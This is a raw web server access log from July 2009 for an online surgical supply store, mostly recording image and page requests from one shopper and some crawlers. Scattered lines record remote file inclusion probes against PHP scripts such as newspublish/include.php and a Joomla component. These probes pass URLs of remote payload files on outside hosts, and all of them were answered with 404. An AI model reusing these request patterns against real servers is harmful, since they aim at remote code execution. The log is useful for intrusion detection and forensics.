70.87.64.234 - - [13/Jul/2009:01:02:25 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:02:28 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.13.246.7 - - [13/Jul/2009:01:03:14 -0400] "GET /logs/access_log.Q109060600/bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/safe2.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
66.249.68.70 - - [13/Jul/2009:01:04:23 -0400] "GET /images/items/04948501_full.jpg HTTP/1.1" 200 10217 "-" "Googlebot-Image/1.0"
70.87.64.234 - - [13/Jul/2009:01:04:24 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:25 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:25 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:34 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:34 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:34 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:46 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:46 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:04:46 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:01:05:57 -0400] "GET /logs/access_log.Q109052100%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:01:06:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.101.70.1 - - [13/Jul/2009:01:06:04 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:06:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:52 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla%20cote HTTP/1.1" 200 38020 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:53 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:53 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:53 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:53 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:53 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:54 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:54 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:54 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:54 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:54 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:54 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:54 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:55 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:55 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:55 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:55 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
70.87.64.234 - - [13/Jul/2009:01:06:55 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:06:55 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:55 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; Google Desktop)"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
70.87.64.234 - - [13/Jul/2009:01:06:56 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:06:56 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
70.87.64.234 - - [13/Jul/2009:01:07:00 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:07:06 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:07:07 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:07:09 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:09 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
70.87.64.234 - - [13/Jul/2009:01:07:10 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:07:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:20 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:20 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
194.183.86.220 - - [13/Jul/2009:01:07:21 -0400] "GET /logs/access_log.Q109060700%20%20/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:07:25 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:39 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:39 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:41 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:44 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:44 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:46 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG HTTP/1.1" 200 76296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):colla cote" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
